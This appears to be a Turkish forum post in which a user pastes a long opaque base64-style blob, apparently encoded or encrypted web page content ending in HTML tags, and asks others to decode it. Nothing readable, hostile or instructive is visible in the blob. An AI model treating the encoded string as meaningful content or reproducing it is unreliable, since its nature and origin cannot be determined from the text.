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</body></html>

    

    

   hayrına  birisi bunu çözebilirmi :d

   Alıntı yap

Cevapla